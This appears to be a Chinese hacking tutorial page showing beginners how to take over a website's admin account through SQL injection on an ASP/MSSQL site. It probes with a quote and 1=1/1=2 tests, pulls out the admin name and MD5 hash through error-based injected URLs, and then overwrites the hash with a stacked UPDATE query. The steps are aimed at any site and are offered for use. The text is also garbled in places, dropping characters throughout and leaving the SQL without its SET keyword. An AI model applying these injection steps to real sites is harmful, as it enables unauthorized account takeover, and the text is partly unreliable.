sqlmd5:SQL注射修改难猜解的MD5

来源:安全中国

在线破解MD5网站WebSite上查但有MD5密码很偏所以些新手会放弃我为新手介绍种很简单就能修改难猜解MD5密码思路方法

  常入侵高手就忽略过..

  随便找个地址

  http://www.xxx.org/s.asp?id=121

  在地址后输入单引号显示

  Microsoft OLE DB Provider for SQL Server  ’80040e14’

  串 ’’’ 的前有未闭合引号

  /s/wantpws.asp行63

  介绍说明没有过滤单引号且数据库是MSSQL.

  and 1=1出错and 1=2正常

  接着输入

  http://www.xxx.org/s.asp?id=1 or admin_user in (select id from admin)

  得到帐号为:admin

  http://www.xxx.org/s.asp?id=121 or admin_password in (select id from admin)

  得到密码为:a4716077c2ba075c

  接下来我们就可以改密码了但我们先前要知道我们加密:e8dc763194f29433

  键入 :

  ;update shop_admin  password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--

  这句意思就是用e8dc763194f29433替换a4716077c2ba075c以达到修改密码

  扫下后台为

  http://www.xxx.org/admin/admin_login.asp



  • 篇文章: Cookies注入思路方法和原理

  • 篇文章: 邮件病毒入侵后正确查杀思路方法
  • Tags:  解md5 sqlservermd5 sqlmd5加密 sqlmd5

    延伸阅读

    最新评论

    发表评论